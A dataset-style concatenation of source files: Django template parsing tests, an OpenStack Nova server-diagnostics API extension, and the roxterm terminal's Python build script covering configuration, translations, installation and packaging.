fe_test(r"'Some \'Bad\' News'", "Some 'Bad' News")
fe = FilterExpression(r'"Some \"Good\" News"', p)
self.assertEqual(fe.filters, [])
self.assertEqual(fe.var, 'Some "Good" News')
# Filtered variables should reject access of attributes beginning with
# underscores.
self.assertRaises(TemplateSyntaxError,
FilterExpression, "article._hidden|upper", p
)
def test_variable_parsing(self):
c = {"article": {"section": "News"}}
self.assertEqual(Variable("article.section").resolve(c), "News")
self.assertEqual(Variable('"News"').resolve(c), "News")
self.assertEqual(Variable("'News'").resolve(c), "News")
# Translated strings are handled correctly.
self.assertEqual(Variable("_(article.section)").resolve(c), "News")
self.assertEqual(Variable('_("Good News")').resolve(c), "Good News")
self.assertEqual(Variable("_('Better News')").resolve(c), "Better News")
# Escaped quotes work correctly as well.
self.assertEqual(
Variable(r'"Some \"Good\" News"').resolve(c), 'Some "Good" News'
)
self.assertEqual(
Variable(r"'Some \'Better\' News'").resolve(c), "Some 'Better' News"
)
# Variables should reject access of attributes beginning with
# underscores.
self.assertRaises(TemplateSyntaxError,
Variable, "article._hidden"
)
| agpl-3.0 |
paulmathews/nova | nova/api/openstack/compute/contrib/server_diagnostics.py | 19 | 2505 | # Copyright 2011 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import webob.exc
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova.api.openstack import xmlutil
from nova import compute
from nova import exception
authorize = extensions.extension_authorizer('compute', 'server_diagnostics')
sd_nsmap = {None: wsgi.XMLNS_V11}
class ServerDiagnosticsTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('diagnostics')
elem = xmlutil.SubTemplateElement(root, xmlutil.Selector(0),
selector=xmlutil.get_items)
elem.text = 1
return xmlutil.MasterTemplate(root, 1, nsmap=sd_nsmap)
class ServerDiagnosticsController(object):
@wsgi.serializers(xml=ServerDiagnosticsTemplate)
def index(self, req, server_id):
context = req.environ["nova.context"]
authorize(context)
compute_api = compute.API()
try:
instance = compute_api.get(context, server_id)
        except exception.NotFound:
raise webob.exc.HTTPNotFound(_("Instance not found"))
return compute_api.get_diagnostics(context, instance)
class Server_diagnostics(extensions.ExtensionDescriptor):
"""Allow Admins to view server diagnostics through server action"""
name = "ServerDiagnostics"
alias = "os-server-diagnostics"
namespace = ("http://docs.openstack.org/compute/ext/"
"server-diagnostics/api/v1.1")
updated = "2011-12-21T00:00:00+00:00"
def get_resources(self):
parent_def = {'member_name': 'server', 'collection_name': 'servers'}
#NOTE(bcwaldon): This should be prefixed with 'os-'
ext = extensions.ResourceExtension('diagnostics',
ServerDiagnosticsController(),
parent=parent_def)
return [ext]
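# Editor's note (hedged, not upstream OpenStack text): the ResourceExtension
# above exposes ServerDiagnosticsController.index() at roughly
#     GET /v2/{tenant_id}/servers/{server_id}/diagnostics
# returning the hypervisor-specific diagnostics dict for the instance.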
| apache-2.0 |
forivall/tacoterm | mscript.py | 3 | 29478 | #!/usr/bin/env python
import errno, os, re, sys, time
from maitch import *
ctx = Context(PACKAGE = "roxterm", SRC_DIR = "${TOP_DIR}/src",
MCFLAGS = "${CPPFLAGS} -I. -I${SRC_DIR} -D_GNU_SOURCE -DHAVE_CONFIG_H")
MINILIB_SOURCES = "colourscheme.c dlg.c display.c dragrcv.c dynopts.c " \
"encodings.c globalopts.c logo.c options.c optsfile.c rtdbus.c"
ROXTERM_CONFIG_SOURCES = "capplet.c colourgui.c configlet.c getname.c " \
"optsdbus.c profilegui.c shortcuts.c"
ROXTERM_SOURCES = "about.c main.c multitab.c multitab-close-button.c " \
"multitab-label.c menutree.c optsdbus.c roxterm.c search.c " \
"shortcuts.c uri.c x11support.c"
ROXTERM_HTML_BASENAMES = "guide index installation news".split()
LOGO_PNG = "${TOP_DIR}/Help/lib/roxterm_logo.png"
FAVICON = "${TOP_DIR}/Help/lib/favicon.ico"
TEXT_LOGO = "${TOP_DIR}/Help/lib/logo_text.png"
APPINFO = "${TOP_DIR}/AppInfo.xml"
VFILE = "${TOP_DIR}/version"
if ctx.mode == 'configure' or ctx.mode == 'help':
ctx.arg_disable('gtk-native-tab-dragging',
"Use ROXTerm's legacy code for dragging tabs "
"instead of GTK+'s functions")
ctx.arg_with('gnome-default-applications',
"Where to install GNOME Default Applications file",
default = None)
ctx.arg_disable('sm', "Don't enable session management")
ctx.arg_disable('nls', "Disable all translations",
default = None)
ctx.arg_disable('translations',
"Disable all translations (same as --disable-nls)", default = None)
ctx.arg_disable('git', "Assume this is a release tarball: "
"don't attempt to generate changelogs, pixmaps etc")
ctx.arg_enable("rox-locales",
"Make symlinks so ROX app can load translations")
if ctx.mode == 'configure':
ctx.find_prog_env("sed")
try:
ctx.find_prog_env("gpg")
except MaitchNotFoundError:
mprint("gpg not found, not signing tarball")
ctx.setenv('SIGN_DIST', False)
else:
ctx.setenv('SIGN_DIST', True)
vfile = ctx.subst(VFILE)
if ctx.env['ENABLE_GIT'] != False:
git = os.path.exists(ctx.subst(opj("${TOP_DIR}", ".git")))
try:
ctx.find_prog_env("git")
except MaitchNotFoundError:
git = False
else:
git = False
if git:
# Might have an obsolete version.h from earlier build
ctx.delete("${SRC_DIR}/version.h")
version = ctx.prog_output(["${GIT}", "describe",
"--match", "[0-9]*"])[0].strip()
version = version.replace('-', '.', 1).replace('-', '~', 1)
ctx.save_if_different(vfile, version + '\n')
gitlog = ctx.prog_output(["/bin/sh", os.path.abspath(
ctx.subst("${TOP_DIR}/genlog"))])[0].lstrip()
# Can't use ctx.save_if_different because it tries to subst
# content and fails
save_if_different(ctx.subst("${TOP_DIR}/ChangeLog"), gitlog)
else:
fp = open(vfile, 'r')
version = fp.read().strip()
fp.close()
ctx.setenv('VERSION', version)
try:
ctx.find_prog_env("xsltproc", "XMLTOMAN")
except MaitchNotFoundError:
mprint("Unable to build manpages without xsltproc", file = sys.stderr)
ctx.setenv("XMLTOMAN", "")
else:
ctx.setenv("XMLTOMAN_OPTS", "-o ${TGT} --nonet --novalid " \
"--param man.charmap.use.subset 0 " \
"http://docbook.sourceforge.net/release/xsl/" \
"current/manpages/docbook.xsl")
ctx.setenv("XMLTOMAN_OUTPUT", "")
if ctx.env['ENABLE_GIT'] != False:
try:
ctx.find_prog_env("convert")
ctx.find_prog_env("composite")
try:
ctx.find_prog_env("rsvg-convert")
except:
ctx.find_prog_env("rsvg")
except:
mprint("WARNING: ImageMagick and/or rsvg binaries appear " \
"not to be installed.\n" \
"This will cause errors later unless the generated " \
"pixmaps are already present,\neg supplied with a " \
"release tarball.",
file = sys.stderr)
ctx.setenv("CONVERT", "")
ctx.setenv("COMPOSITE", "")
else:
ctx.setenv("CONVERT", "")
ctx.setenv("COMPOSITE", "")
ctx.setenv('BUG_TRACKER', "http://sourceforge.net/tracker/?group_id=124080")
trans = ctx.env['ENABLE_TRANSLATIONS'] and ctx.env['ENABLE_NLS']
if trans != False:
try:
ctx.find_prog_env("xgettext")
ctx.find_prog_env("msgcat")
ctx.find_prog_env("msgmerge")
ctx.find_prog_env("msgfmt")
except MaitchNotFoundError:
if trans == True:
raise
else:
mprint("WARNING: Translation tools not found, not building " \
" programs' translations", file = sys.stderr)
ctx.setenv('HAVE_GETTEXT', False)
else:
ctx.setenv('HAVE_GETTEXT', True)
else:
ctx.setenv('HAVE_GETTEXT', False)
if trans != False:
try:
ctx.find_prog_env("po4a-gettextize")
ctx.find_prog_env("po4a-updatepo")
ctx.find_prog_env("po4a-translate")
except MaitchNotFoundError:
if trans == True:
raise
else:
mprint("WARNING: po4a tools not found, not building " \
"documentation's translations", file = sys.stderr)
ctx.setenv('HAVE_PO4A', False)
else:
ctx.setenv('HAVE_PO4A', True)
ctx.setenv('PO4ACHARSET', "-M UTF-8")
ctx.setenv('PO4AOPTS', "${PO4ACHARSET} --package-name=${PACKAGE} " \
"--package-version=${VERSION} " \
"--copyright-holder='Tony Houghton' " \
"--msgid-bugs-address=${BUG_TRACKER}")
ctx.setenv('PO4ADIR', "${ABS_TOP_DIR}/po4a")
ctx.setenv('PO4ABUILDDIR', "${ABS_BUILD_DIR}/po4a")
else:
ctx.setenv('HAVE_PO4A', False)
if trans != False and ctx.env['HAVE_GETTEXT']:
try:
ctx.find_prog_env("itstool")
except MaitchNotFoundError:
if trans == True:
raise
else:
mprint("WARNING: itstool not found, not building " \
"AppData file's translations", file = sys.stderr)
ctx.setenv('HAVE_ITSTOOL', False)
else:
ctx.setenv('HAVE_ITSTOOL', True)
ctx.setenv('POXML_DIR', "${ABS_TOP_DIR}/poxml")
ctx.setenv('POXML_BUILD_DIR', "${ABS_BUILD_DIR}/poxml")
ctx.setenv('APPDATA_ITS', "${POXML_DIR}/appdata.its")
else:
ctx.setenv('HAVE_ITSTOOL', False)
gda = ctx.env.get("WITH_GNOME_DEFAULT_APPLICATIONS")
if gda == None or gda == True:
try:
gda = ctx.prog_output("${PKG_CONFIG} "
"--variable=defappsdir gnome-default-applications")
except MaitchChildError:
if gda == True:
raise
else:
gda = ""
elif gda == False:
gda = ""
ctx.setenv("WITH_GNOME_DEFAULT_APPLICATIONS", gda)
ctx.pkg_config('gtk+-3.0', 'GTK', '3.10')
ctx.pkg_config('vte-2.91', 'VTE')
vte_version = ctx.prog_output("${PKG_CONFIG} --modversion vte-2.91")
ctx.setenv('NEED_TRANSPARENCY_FIX', vte_version >= "0.34.8")
sm = ctx.env['ENABLE_SM']
if sm != False:
try:
ctx.pkg_config('sm ice', 'SM')
except MaitchChildError:
if sm == True:
raise
sm = False
else:
sm = True
ctx.define('ENABLE_SM', sm)
ctx.pkg_config('dbus-1', 'DBUS', '1.0')
ctx.pkg_config('dbus-glib-1', 'DBUS', '0.22')
ctx.pkg_config('gmodule-export-2.0', 'GMODULE')
ctx.pkg_config('x11')
for f in ["get_current_dir_name"]:
ctx.check_func(f, "${CFLAGS} ${MCFLAGS} ${LIBS}")
#for f in "get_current_dir_name g_mkdir_with_parents " \
# "gdk_window_get_display gdk_window_get_screen " \
# "gtk_widget_get_realized gtk_widget_get_mapped " \
# "gtk_combo_box_text_new gtk_rc_style_unref " \
# "gtk_drag_begin_with_coordinates".split():
# ctx.check_func(f, "${CFLAGS} ${MCFLAGS} ${GTK_CFLAGS}",
# "${LIBS} ${GTK_LIBS}")
for f in ["vte_terminal_set_word_chars",
"vte_terminal_set_background_tint_color"]:
ctx.check_func(f, "${CFLAGS} ${MCFLAGS} ${VTE_CFLAGS}",
"${LIBS} ${VTE_LIBS}")
ctx.setenv('CORE_CFLAGS',
"${CFLAGS} ${MCFLAGS} ${GTK_CFLAGS} ${DBUS_CFLAGS}")
ctx.setenv('CORE_LIBS',
"${LIBS} ${GTK_LIBS} ${DBUS_LIBS}")
ctx.setenv('ROXTERM_CFLAGS',
"${CFLAGS} ${MCFLAGS} ${VTE_CFLAGS} ${SM_CFLAGS} ${DBUS_CFLAGS}")
ctx.setenv('ROXTERM_LIBS',
"${LIBS} ${VTE_LIBS} ${SM_LIBS} ${DBUS_LIBS} ${X11_LIBS}")
ctx.setenv('ROXTERM_CONFIG_CFLAGS',
"${CFLAGS} ${MCFLAGS} ${GTK_CFLAGS} ${DBUS_CFLAGS} " \
"${GMODULE_CFLAGS} -DROXTERM_CAPPLET")
ctx.setenv('ROXTERM_CONFIG_LIBS',
"${LIBS} ${GTK_LIBS} ${DBUS_LIBS} ${GMODULE_LIBS}")
ctx.define_from_var('PACKAGE')
ctx.define('DO_OWN_TAB_DRAGGING',
ctx.env.get('ENABLE_GTK_NATIVE_TAB_DRAGGING', True))
ctx.define('SYS_CONF_DIR', ctx.env['SYSCONFDIR'])
ctx.define('DATA_DIR', ctx.env['DATADIR'])
ctx.define('PKG_DATA_DIR', opj(ctx.env['DATADIR'], "roxterm"))
ctx.define('ICON_DIR',
opj(ctx.env['DATADIR'], "icons", "hicolor", "scalable", "apps"))
ctx.define('HTML_DIR', ctx.env['HTMLDIR'])
ctx.setenv('htmldir', "${HTMLDIR}")
ctx.define('BIN_DIR', ctx.env['BINDIR'])
if ctx.env['HAVE_GETTEXT']:
ctx.define('ENABLE_NLS', 1)
else:
ctx.define('ENABLE_NLS', None)
ctx.define_from_var('LOCALEDIR')
ctx.define_from_var('NEED_TRANSPARENCY_FIX')
ctx.subst_file("${TOP_DIR}/roxterm.1.xml.in",
"${BUILD_DIR}/roxterm.1.xml", True)
ctx.subst_file("${TOP_DIR}/roxterm-config.1.xml.in",
"${BUILD_DIR}/roxterm-config.1.xml", True)
ctx.subst_file("${TOP_DIR}/roxterm.spec.in", "${BUILD_DIR}/roxterm.spec")
ctx.subst_file("${TOP_DIR}/.ycm_extra_conf.py.in",
"${TOP_DIR}/.ycm_extra_conf.py", True)
ctx.setenv('APPINFO_STRING', "${VERSION} (%s)" % \
time.strftime("%Y-%m-%d", time.gmtime(time.time())))
if not os.path.exists(ctx.subst(APPINFO)):
ctx.subst_file(APPINFO + ".in", APPINFO)
ctx.save_if_different("version.h",
'/* Auto-generated by mscript.py */\n' \
'#ifndef VERSION_H\n' \
'#define VERSION_H\n' \
'#define VERSION "${VERSION}"\n' \
'#endif\n')
ctx.created_by_config['version.h'] = True
# Make symlinks expected by ROX
for f in "AUTHORS ChangeLog COPYING COPYING-LGPL NEWS README".split():
if f == "ChangeLog":
dest = "${TOP_DIR}/Help/Changes"
else:
dest = "${TOP_DIR}/Help/" + f
src = "../" + f
if subprocess.call(["ln", "-nfs", src, ctx.subst(dest)]):
raise MaitchChildError("Failed to link '%s' Help file" % f)
elif ctx.mode == 'build':
# Private library
for c in MINILIB_SOURCES.split():
ctx.add_rule(StaticLibCRule(
sources = c,
cflags = "${CORE_CFLAGS}",
prefix = "libroxterm-",
quiet = True))
ctx.add_rule(CStaticLibRule(
sources = change_suffix_with_prefix(MINILIB_SOURCES,
".c", ".lo", "libroxterm-"),
targets = "libroxterm.la",
cflags = "${CORE_CFLAGS}",
libs = "${CORE_LIBS}",
quiet = True))
# roxterm
if bool(ctx.env['ENABLE_SM']):
ROXTERM_SOURCES += " session.c"
for c in ROXTERM_SOURCES.split():
ctx.add_rule(LibtoolCRule(
sources = c,
cflags = "${ROXTERM_CFLAGS}",
prefix = "roxterm-",
wdeps = "version.h"))
ctx.add_rule(LibtoolCProgramRule(
sources = change_suffix_with_prefix(ROXTERM_SOURCES,
".c", ".lo", "roxterm-"),
targets = "roxterm",
cflags = "${ROXTERM_CFLAGS}",
libs = "${ROXTERM_LIBS} -lroxterm",
deps = "libroxterm.la",
quiet = True))
# roxterm-config
for c in ROXTERM_CONFIG_SOURCES.split():
ctx.add_rule(LibtoolCRule(
sources = c,
cflags = "${ROXTERM_CONFIG_CFLAGS}",
prefix = "roxterm-config-"))
ctx.add_rule(LibtoolCProgramRule(
sources = change_suffix_with_prefix(ROXTERM_CONFIG_SOURCES,
".c", ".lo", "roxterm-config-"),
targets = "roxterm-config",
cflags = "${ROXTERM_CONFIG_CFLAGS}",
libs = "${ROXTERM_CONFIG_LIBS} -lroxterm",
deps = "libroxterm.la",
quiet = True))
# Stuff other than the program
# Graphics
if ctx.env['CONVERT']:
ctx.add_rule(Rule(rule = "${CONVERT} -background #0000 " \
"${SRC} -geometry 64x64 ${TGT}",
targets = LOGO_PNG,
sources = "roxterm.svg",
where = TOP))
# Note 'where' is NOWHERE for following two rules because sources
# already start with ${TOP_DIR}.
ctx.add_rule(Rule(rule = "${CONVERT} ${SRC} -geometry 16x16 ${TGT}",
targets = FAVICON,
sources = LOGO_PNG,
where = NOWHERE))
ctx.add_rule(Rule( \
rule = "${COMPOSITE} -gravity SouthWest ${SRC} ${TGT}",
targets = TEXT_LOGO,
sources = [LOGO_PNG, "${TOP_DIR}/Help/lib/logo_text_only.png"],
where = NOWHERE))
# man pages
if ctx.env['XMLTOMAN']:
xmltomanrule = "${XMLTOMAN} ${XMLTOMAN_OPTS} ${SRC} ${XMLTOMAN_OUTPUT}"
# Something is causing a thread to hang between calling xsltproc
# and exiting from subprocess.Popen. Could it be trying to run two
# at once? Making one wdep on the other should stop jobs overlapping.
ctx.add_rule(Rule(
rule = xmltomanrule,
targets = "roxterm.1",
sources = "roxterm.1.xml",
where = TOP))
ctx.add_rule(Rule(
rule = xmltomanrule,
targets = "roxterm-config.1",
sources = "roxterm-config.1.xml",
wdeps = "roxterm.1",
where = TOP))
#ctx.add_rule(SuffixRule(
# rule = xmltomanrule,
# targets = ".1",
# sources = ".1.xml",
# where = TOP))
# Force invocation of above suffix rule
#ctx.add_rule(TouchRule(
# targets = "manpages",
# sources = "roxterm.1 roxterm-config.1"))
# Translations (gettext)
if ctx.env['HAVE_GETTEXT']:
podir = '${ABS_BUILD_DIR}/po'
ctx.add_rule(Rule(rule = mkdir_rule, targets = podir))
args = { 'copyright_holder': "(c) 2013 Tony Houghton",
'version': "${VERSION}",
'bugs_addr': "${BUG_TRACKER}",
'use_shell': True,
'dir': podir }
code_pot = '${ABS_BUILD_DIR}/po/code.pot'
glade_pot = '${ABS_BUILD_DIR}/po/glade.pot'
trans_rules = PoRulesFromLinguas(ctx, **args) + \
PotRules(ctx,
targets = code_pot,
deps = podir,
xgettext_opts = '-C -k_ -kN_',
**args)
for r in trans_rules:
ctx.add_rule(r)
ctx.add_rule(PotRule(ctx,
sources = '../src/roxterm-config.ui',
targets = glade_pot,
deps = podir,
xgettext_opts = '-L Glade',
dir = "${ABS_TOP_DIR}/po"))
ctx.add_rule(Rule(sources = [code_pot, glade_pot],
targets = '${ABS_TOP_DIR}/po/${PACKAGE}.pot',
rule = '${MSGCAT} -o ${TGT} ${SRC}',
diffpat = gettext_diffpat))
# Symlinks so ROX can use translations
if ctx.env["ENABLE_ROX_LOCALES"]:
def add_rox_locale(ctx, l, f):
d = opj("locale", l, "LC_MESSAGES")
ctx.add_rule(Rule(rule = mkdir_rule, targets = d))
ctx.add_rule(Rule(rule = "ln -nfs ../../po/%s.mo ${TGT}" % l,
targets = opj(d, "roxterm.mo"),
wdeps = [d, opj("po", "%s.mo" % l)]))
foreach_lingua(ctx, add_rox_locale)
ctx.add_rule(Rule(rule = "ln -nfs pt_BR ${TGT}",
targets = opj("locale", "pt"),
wdeps = opj("locale", "pt_BR", "LC_MESSAGES")))
# Translations (po4a)
if ctx.env['HAVE_PO4A']:
linguas = parse_linguas(ctx, podir = "${PO4ADIR}")
charset_rule = "${SED} -i s/charset=CHARSET/charset=UTF-8/ ${TGT}"
ctx.ensure_out_dir("po4a")
if ctx.env['XMLTOMAN']:
# Workaround for deadlock (?)
lastmtarget = None
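                # For each man page the pipeline below is: extract a POT
                # with po4a-gettextize, refresh each language's .po with
                # po4a-updatepo, emit a translated .xml.in with
                # po4a-translate, substitute @VERSION@/@htmldir@ with sed,
                # then build the localised man page with xmltoman.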
for m in ["roxterm", "roxterm-config"]:
ctx.add_rule(Rule(rule = ["${PO4A_GETTEXTIZE} ${PO4AOPTS} " \
"-f docbook -m ${SRC} -p ${TGT}",
charset_rule],
sources = "../%s.1.xml.in" % m,
targets = "%s.1.pot" % m,
where = NOWHERE,
diffpat = gettext_diffpat,
dir = "${PO4ADIR}",
use_shell = True))
for l in linguas:
po = "${PO4ADIR}/%s.1.%s.po" % (m, l)
ctx.add_rule(Rule(rule = ["${PO4A_UPDATEPO} ${PO4AOPTS} " \
"-f docbook -m ${SRC} -p ${TGT}",
charset_rule,
"rm -f ${TGT}~"],
sources = ["../%s.1.xml.in" % m, "%s.1.pot" % m],
targets = po,
diffpat = gettext_diffpat,
where = NOWHERE,
dir = "${PO4ADIR}",
use_shell = True))
ctx.add_rule(Rule(rule = "${PO4A_TRANSLATE} "
"${PO4ACHARSET} " \
"-k 0 -f docbook -m ../%s.1.xml.in " \
"-p ${SRC} -l ${TGT}" % m,
sources = po,
targets = "${ABS_BUILD_DIR}/po4a/%s.1.%s.xml.in" % \
(m, l),
where = NOWHERE,
dir = "${PO4ADIR}",
use_shell = True))
ctx.add_rule(Rule(rule = "${SED} " \
"'s/@VERSION@/${VERSION}/; " \
"s#@htmldir@#${HTMLDIR}#' <${SRC} >${TGT}",
sources = "${PO4ABUILDDIR}/%s.1.%s.xml.in" % (m, l),
targets = "${PO4ABUILDDIR}/%s.1.%s.xml" % (m, l),
deps = po,
where = NOWHERE,
use_shell = True))
mtarget = "${PO4ABUILDDIR}/%s/%s.1" % (l, m)
ctx.add_rule(Rule( \
rule = [mk_parent_dir_rule, xmltomanrule],
sources = "${PO4ABUILDDIR}/%s.1.%s.xml" % (m, l),
targets = mtarget,
wdeps = lastmtarget,
where = NOWHERE))
lastmtarget = mtarget
for h in ROXTERM_HTML_BASENAMES:
master = "../Help/en/%s.html" % h
pot = "%s.html.pot" % h
ctx.add_rule(Rule(rule = ["${PO4A_GETTEXTIZE} ${PO4AOPTS} " \
"-f xhtml -m ${SRC} -p ${TGT}",
charset_rule,
"${SED} -i 's/SOME DESCRIPTIVE TITLE/" \
"Translations for roxterm docs/' ${TGT}",
"${SED} -i 's/Copyright (C) YEAR/" + \
"Copyright (C) 2010-2014/' " \
"${TGT}",
"${SED} -i 's/FIRST AUTHOR <EMAIL@ADDRESS>, YEAR/"
"Tony Houghton <[email protected]>, 2014/' ${TGT}"],
sources = master,
targets = "${PO4ADIR}/" + pot,
where = NOWHERE,
dir = "${PO4ADIR}",
use_shell = True))
for l in linguas:
ldir = "../Help/%s" % l
ctx.ensure_out_dir(ldir)
po = "${PO4ADIR}/%s.html.%s.po" % (h, l)
ctx.add_rule(Rule(rule = ["${PO4A_UPDATEPO} ${PO4AOPTS} " \
"-f xhtml -m ${SRC} -p ${TGT}",
charset_rule],
sources = [master, pot],
targets = po,
where = NOWHERE,
dir = "${PO4ADIR}",
use_shell = True))
ctx.add_rule(Rule(rule = [mk_parent_dir_rule,
"${PO4A_TRANSLATE} "
"${PO4ACHARSET} " \
"-k 0 -f xhtml -m %s " \
"-p ${SRC} -l ${TGT}" % master],
sources = po,
targets = "${ABS_TOP_DIR}/Help/%s/%s.html" % (ldir, h),
where = NOWHERE,
dir = "${PO4ADIR}",
use_shell = True))
# Translations (itstool)
if ctx.env['HAVE_ITSTOOL']:
podir = "${POXML_DIR}"
linguas = parse_linguas(ctx, podir = podir)
basename = "roxterm.appdata.xml"
xmlout = "${ABS_BUILD_DIR}/" + basename
xmlin = "../" + basename + ".in"
potfile = "${POXML_DIR}/roxterm.appdata.xml.pot"
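            # itstool extracts the translatable strings from the appdata
            # XML into a POT; if any linguas are configured, the compiled
            # .mo files are merged back with "itstool -j" to produce the
            # translated appdata file.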
ctx.add_rule(Rule( \
rule = ["${ITSTOOL} -i ${APPDATA_ITS} -o ${TGT} ${SRC}",
"${SED} -i 's/Project-Id-Version: PACKAGE VERSION/" \
"Project-Id-Version: roxterm ${VERSION}/' " \
"${TGT}"],
sources = xmlin,
targets = potfile,
deps = "${APPDATA_ITS}",
where = NOWHERE,
dir = podir,
use_shell = True))
if linguas:
for r in PoRulesFromLinguas(ctx, podir = podir,
modir = "${POXML_BUILD_DIR}",
sources = potfile):
ctx.add_rule(r)
sources = []
for l in parse_linguas(ctx, podir = podir):
sources.append(opj("${POXML_BUILD_DIR}", l + ".mo"))
ctx.add_rule(Rule( \
rule = "${ITSTOOL} -i ${APPDATA_ITS} -j " + xmlin +
" -o ${TGT} ${SRC}",
sources = sources,
targets = xmlout,
dir = podir,
where = NOWHERE))
else:
linguas = None
if not linguas:
ctx.add_rule(Rule(rule = "cp ${SRC} ${TGT}",
sources = "${ABS_TOP_DIR}/roxterm.appdata.xml.in",
targets = "${ABS_BUILD_DIR}/roxterm.appdata.xml",
where = NOWHERE))
elif ctx.mode == "install" or ctx.mode == "uninstall":
ctx.install_bin("roxterm roxterm-config")
ctx.install_data("roxterm-config.ui")
ctx.install_data("roxterm.desktop", "${DATADIR}/applications")
ctx.install_data("roxterm.appdata.xml", "${DATADIR}/appdata")
if ctx.env['XMLTOMAN']:
ctx.install_man("roxterm.1 roxterm-config.1")
ctx.install_doc("AUTHORS ChangeLog README")
ctx.install_doc(ctx.glob("*.html",
subdir = ctx.subst("${TOP_DIR}/Help/en")),
"${HTMLDIR}/en")
ctx.install_doc(ctx.glob("*.png",
subdir = ctx.subst("${TOP_DIR}/Help/lib")),
"${HTMLDIR}/lib")
ctx.install_doc(ctx.glob("*.css",
subdir = ctx.subst("${TOP_DIR}/Help/lib")),
"${HTMLDIR}/lib")
ctx.install_data("roxterm.svg", "${DATADIR}/icons/hicolor/scalable/apps")
ctx.install_data(["Config/Colours/Tango", "Config/Colours/GTK"],
"${PKGDATADIR}/Config/Colours")
ctx.install_data("Config/Shortcuts/Default",
"${PKGDATADIR}/Config/Shortcuts")
gda = ctx.env['WITH_GNOME_DEFAULT_APPLICATIONS']
if gda:
ctx.install_data("roxterm.xml", gda)
linguas = parse_linguas(ctx)
if ctx.env['HAVE_GETTEXT']:
for l in linguas:
ctx.install_data("po/%s.mo" % l,
"${LOCALEDIR}/%s/LC_MESSAGES/roxterm.mo" % l,
other_options = "-T")
ptdir = ctx.subst("${DESTDIR}/${LOCALEDIR}/pt/LC_MESSAGES")
ctx.ensure_out_dir(ptdir)
call_subprocess(["ln", "-sfn",
"../../pt_BR/LC_MESSAGES/roxterm.mo", ptdir])
if ctx.env['HAVE_PO4A']:
for l in linguas:
if ctx.env['XMLTOMAN']:
ctx.install_man("po4a/%s/roxterm.1 po4a/%s/roxterm-config.1" % \
(l, l), opj("${MANDIR}", l))
ctx.install_doc( \
ctx.glob("*.html",
subdir = ctx.subst("${TOP_DIR}/Help/%s" % l)),
"${HTMLDIR}/%s" % l)
ptdir = ctx.subst("${DESTDIR}/${MANDIR}/pt/man1")
ctx.ensure_out_dir(ptdir)
call_subprocess(["ln", "-sfn", "../../pt_BR/man1/roxterm.1", ptdir])
call_subprocess(["ln", "-sfn", "../../pt_BR/man1/roxterm-config.1",
ptdir])
call_subprocess(["ln", "-sfn", "pt_BR",
ctx.subst("${DESTDIR}/${HTMLDIR}/pt")])
elif ctx.mode == 'pristine' or ctx.mode == 'clean':
clean = ["${TOP_DIR}/maitch.pyc"] + \
["${TOP_DIR}/.ycm_extra_conf.py",
"${TOP_DIR}/.ycm_extra_conf.pyc"] + \
ctx.glob("*.po~", "${TOP_DIR}", "po") + \
ctx.glob("*.po~", "${TOP_DIR}", "po4a") + \
ctx.glob("*.po~", "${TOP_DIR}", "poxml")
if ctx.mode == 'pristine':
clean += [APPINFO, VFILE, "${TOP_DIR}/ChangeLog"] + \
["${TOP_DIR}/Help/" + f for f in \
"AUTHORS COPYING COPYING-LGPL Changes NEWS README".split()] + \
["${TOP_DIR}/Help/lib/" + f for f in \
"favicon.ico logo_text.png roxterm_logo.png".split()] + \
ctx.glob("*.pot", "${TOP_DIR}", "po") + \
ctx.glob("*.pot", "${TOP_DIR}", "po4a") + \
ctx.glob("*.pot", "${TOP_DIR}", "poxml")
for f in clean:
ctx.delete(f)
# Generated HTML doesn't go in tarball so must be cleaned
f = open(ctx.subst("${TOP_DIR}/po4a/LINGUAS"), 'r')
hd = ctx.subst("${TOP_DIR}/Help/")
for d in [hd + l.strip() for l in f.readlines() + ['pt']]:
recursively_remove(d, False, [])
f.close()
elif ctx.mode == 'dist':
ctx.subst_file(APPINFO + ".in", APPINFO)
ctx.add_dist("AUTHORS Help/AUTHORS " \
"genlog ChangeLog ChangeLog.old Config " \
"COPYING COPYING-LGPL Help/en Help/lib/header.png " \
"Help/lib/logo_text_only.png " \
"Help/lib/roxterm.css Help/lib/roxterm_ie.css "
"Help/lib/sprites.png " \
"INSTALL INSTALL.Debian " \
"NEWS README README.translations " \
"roxterm.1.xml.in roxterm-config.1.xml.in " \
"roxterm.appdata.xml.in " \
"roxterm.desktop roxterm.lsm.in roxterm.spec.in " \
"roxterm.svg roxterm.xml TODO " \
"src/roxterm-config.glade src/roxterm-config.ui " \
".ycm_extra_conf.py.in")
ctx.add_dist([f.replace("${TOP_DIR}/", "") \
for f in [LOGO_PNG, FAVICON, TEXT_LOGO]])
ctx.add_dist(ctx.glob("*.[c|h]", os.curdir, "src"))
# maitch-specific
ctx.add_dist("version maitch.py mscript.py")
# ROX bits
ctx.add_dist("AppInfo.xml.in AppRun .DirIcon " \
"Help/Changes Help/COPYING Help/COPYING-LGPL Help/NEWS Help/README")
if os.path.exists("AppInfo.xml"):
ctx.add_dist("AppInfo.xml")
# Translations
for f in ("po/LINGUAS", "po4a/LINGUAS", "poxml/LINGUAS",
"po/POTFILES.in", "po/roxterm.pot",
"poxml/appdata.its", "poxml/roxterm.appdata.xml.pot"):
if os.path.exists(f):
ctx.add_dist(f)
files = ctx.glob("*.po", os.curdir, "po") + \
ctx.glob("*.po", os.curdir, "po4a") + \
ctx.glob("*.pot", os.curdir, "po4a") + \
ctx.glob("*.po", os.curdir, "poxml")
if files:
ctx.add_dist(files)
ctx.run()
if ctx.mode == 'uninstall':
ctx.prune_directory("${DATADIR}/icons")
ctx.prune_directory("${PKGDATADIR}")
ctx.prune_directory("${DOCDIR}")
ctx.prune_directory("${HTMLDIR}")
elif ctx.mode == 'uninstall':
basedir = self.subst("${PACKAGE}-${VERSION}")
filename = os.path.abspath(
self.subst("${BUILD_DIR}/%s.%s" % (basedir, suffix)))
mprint("Creating %s '%s'" % (zname, filename))
| gpl-2.0 |
kondrak/bgfx | 3rdparty/scintilla/scripts/FileGenerator.py | 74 | 6509 | #!/usr/bin/env python
